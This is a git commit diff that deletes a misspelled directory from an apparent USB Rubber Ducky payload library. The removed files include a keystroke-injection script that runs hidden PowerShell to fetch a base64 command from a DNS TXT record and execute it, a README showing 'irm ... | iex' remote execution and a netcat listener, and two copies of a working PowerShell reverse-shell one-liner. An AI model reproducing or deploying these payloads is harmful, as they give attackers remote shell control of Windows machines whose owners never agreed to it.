Delete payloads/library/execution/DNS-TXT-CommandInection directory
Misspelled "injection": deleting the directory; all content has been moved to the DNS-TXT-CommandInjection directory.
pull/468/head
parent
7c989706cc
commit
1fd0843049
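--- a/payloads/library/execution/DNS-TXT-CommandInection/.gitignore
+++ b/payloads/library/execution/DNS-TXT-CommandInection/.gitignore
@@ -1,175 +0,0 @@
-# VSCode
-.vscode/*
-!.vscode/settings.json
-!.vscode/tasks.json
-!.vscode/launch.json
-!.vscode/extensions.json
-*.code-workspace
-# Local History for Visual Studio Code
-.history/
-
-# Common credential files
-**/credentials.json
-**/client_secrets.json
-**/client_secret.json
-*creds*
-*.dat
-*password*
-*.httr-oauth*
-
-# Private Node Modules
-node_modules/
-creds.js
-
-# Private Files
-*.json
-*.csv
-*.csv.gz
-*.tsv
-*.tsv.gz
-*.xlsx
-
-
-# Mac/OSX
-.DS_Store
-
-
-# Byte-compiled / optimized / DLL files
-__pycache__/
-*.py[cod]
-*$py.class
-
-# C extensions
-*.so
-
-# Distribution / packaging
-.Python
-build/
-develop-eggs/
-dist/
-downloads/
-eggs/
-.eggs/
-lib/
-lib64/
-parts/
-sdist/
-var/
-wheels/
-share/python-wheels/
-*.egg-info/
-.installed.cfg
-*.egg
-MANIFEST
-
-# PyInstaller
-# Usually these files are written by a python script from a template
-# before PyInstaller builds the exe, so as to inject date/other infos into it.
-*.manifest
-*.spec
-
-# Installer logs
-pip-log.txt
-pip-delete-this-directory.txt
-
-# Unit test / coverage reports
-htmlcov/
-.tox/
-.nox/
-.coverage
-.coverage.*
-.cache
-nosetests.xml
-coverage.xml
-*.cover
-*.py,cover
-.hypothesis/
-.pytest_cache/
-cover/
-
-# Translations
-*.mo
-*.pot
-
-# Django stuff:
-*.log
-local_settings.py
-db.sqlite3
-db.sqlite3-journal
-
-# Flask stuff:
-instance/
-.webassets-cache
-
-# Scrapy stuff:
-.scrapy
-
-# Sphinx documentation
-docs/_build/
-
-# PyBuilder
-.pybuilder/
-target/
-
-# Jupyter Notebook
-.ipynb_checkpoints
-
-# IPython
-profile_default/
-ipython_config.py
-
-# pyenv
-# For a library or package, you might want to ignore these files since the code is
-# intended to run in multiple environments; otherwise, check them in:
-# .python-version
-
-# pipenv
-# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
-# However, in case of collaboration, if having platform-specific dependencies or dependencies
-# having no cross-platform support, pipenv may install dependencies that don't work, or not
-# install all needed dependencies.
-#Pipfile.lock
-
-# PEP 582; used by e.g. github.com/David-OConnor/pyflow
-__pypackages__/
-
-# Celery stuff
-celerybeat-schedule
-celerybeat.pid
-
-# SageMath parsed files
-*.sage.py
-
-# Environments
-.env
-.venv
-env/
-venv/
-ENV/
-env.bak/
-venv.bak/
-
-# Spyder project settings
-.spyderproject
-.spyproject
-
-# Rope project settings
-.ropeproject
-
-# mkdocs documentation
-/site
-
-# mypy
-.mypy_cache/
-.dmypy.json
-dmypy.json
-
-# Pyre type checker
-.pyre/
-
-# pytype static type analyzer
-.pytype/
-
-# Cython debug symbols
-cython_debug/
-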
@ -1,38 +0,0 @@
|
||||||
REM Title: DNS-TXT-CommandInjection
|
|
||||||
REM Author: Nate
|
|
||||||
REM Description: A usb rubber ducky payload that leverages DNS TXT records to perform command injection.
|
|
||||||
REM Windows Powershell is the CLI used by the payload. Replace the DNS TXT record for your domain with
|
|
||||||
REM the base64 encoded payload you have. See README.md for more details on converting your payload to base64
|
|
||||||
REM and an example of creating your DNS TXT record in AWS Route53 service.
|
|
||||||
REM Target: Windows 10, 11
|
|
||||||
REM Props: Hak5, Darren Kitchen, Korben
|
|
||||||
REM Version: 1.0
|
|
||||||
REM Category: Execution
|
|
||||||
|
|
||||||
REM CONFIGURATION
|
|
||||||
REM REQUIRED A domain with the ability to manipulate the DNS TXT records.
|
|
||||||
REM REQUIRED Web Server hosting the payload. In this example, python3 http.server was used to host a
|
|
||||||
REM reverseshell.
|
|
||||||
REM REQUIRED A listener for incoming connections like netcat.
|
|
||||||
REM REQUIRED - Provide URL used for Example
|
|
||||||
DEFINE #MY_TARGET_URL example.com
|
|
||||||
REM Example: powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
|
|
||||||
REM Example of Decoded payload: "irm http://MY_TARGET_URL/T1.txt | iex"
|
|
||||||
|
|
||||||
REM NOTES: No base64 can be used as an alternative by replacing "$a=",";powershell -e $a" with just "|iex"
|
|
||||||
REM for the STRING payload below. Examples of the decoded command and encoded command are shown below to put
|
|
||||||
REM into DNS TXT record.
|
|
||||||
REM Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"
|
|
||||||
REM Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="
|
|
||||||
|
|
||||||
REM ShoutOut: powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok. See link below.
|
|
||||||
REM https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
|
|
||||||
REM The link below has the Powershell script to convert your payloads to Base64.
|
|
||||||
REM https://https://github.com/nathansb2022/usbrubberducky-payloads/blob/master/payloads/library/execution/DNS-TXT-CommandInection/convertBase64.ps1
|
|
||||||
|
|
||||||
DELAY 1000
|
|
||||||
GUI r
|
|
||||||
DELAY 1000
|
|
||||||
STRING powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
|
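--- a/payloads/library/execution/DNS-TXT-CommandInection/README.md
+++ b/payloads/library/execution/DNS-TXT-CommandInection/README.md
@@ -1,49 +0,0 @@
-# DNS-TXT-CommandInjection
-Ducky Script uses Resolve-DnsName to perform a DNS name query resolution for a domain hosting a malicious TXT record.
-## Description
-A usb rubber ducky payload that leverages DNS TXT records to perform command injection. Windows Powershell is the CLI used by the payload. Replace the DNS TXT record for your domain with the base64 encoded payload you have. See link below for an example of creating your DNS TXT record in AWS Route53 service.
-## Requirements
-A domain with the ability to manipulate the DNS TXT records.
-Web Server hosting the payload. In this example, python3 http.server was used to host a reverseshell.
-A listener for incoming connections like netcat.
-Provide URL used for Example
-DEFINE #MY_TARGET_URL example.com
-
-## Notes
-No base64 can be used as an option by replacing "$a=",";powershell -e $a" with just "|iex" for the STRING payload below. Examples of the decoded command and encoded command are shown below to put into DNS TXT record.
-Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"
-Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="
-powershellReverseShellOne-liner.ps1 is identical to T1.txt. (file name shortened due to character limitations)
-## Windows Commands (used in payload)
-### Execute DNS TXT Payload
-```Powershell
-powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
-```
-### Execute web hosted Powershell Reverseshell
-```Powershell
-irm http://MY_TARGET_URL/T1.txt | iex
-```
-### [Powershell Reverseshell One-liner](https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3)
-```Powershell
-.\powershellReverseShellOne-liner.ps1
-```
-### Convert payload to base64
-```Powershell
-.\convertBase64.ps1
-```
-### Alternative to executing Powershell Script
-```Powershell
-gc -raw .\convertBase64.ps1 | iex
-```
-## Linux Commands
-```bash
-nc -lvnp 1337
-```
-### Links
-
-[Powershell Reverseshell One-liner](https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3)
-
-[Convert to base64](https://github.com/nathansb2022/usbrubberducky-payloads/blob/master/payloads/library/execution/DNS-TXT-CommandInection/convertBase64.ps1)
-
-[Create TXT record in AWS Route53](https://www.entrust.com/knowledgebase/ssl/how-to-create-a-txt-record-on-amazon-aws-route-53-for-entrust-email-validation-method)
-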
@ -1,5 +0,0 @@
|
||||||
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
|
|
||||||
# CONFIGURATION
|
|
||||||
# REQUIRED - Provide IP and Port used for Example
|
|
||||||
# DEFINE #MY_TARGET_IP and Port after TCPClient(
|
|
||||||
$client = New-Object System.Net.Sockets.TCPClient('1.2.3.4',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
|
|
|
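--- a/payloads/library/execution/DNS-TXT-CommandInection/convertBase64.ps1
+++ b/payloads/library/execution/DNS-TXT-CommandInection/convertBase64.ps1
@@ -1,4 +0,0 @@
-$text = Read-Host -prompt "What would you like to encode"
-$base64Text = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($text))
-echo $base64Text
-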
@ -1,6 +0,0 @@
|
||||||
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
|
|
||||||
# CONFIGURATION
|
|
||||||
# REQUIRED - Provide IP and Port used for Example
|
|
||||||
# DEFINE #MY_TARGET_IP and Port after TCPClient(
|
|
||||||
$client = New-Object System.Net.Sockets.TCPClient('1.2.3.4',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
|
|
||||||
|
|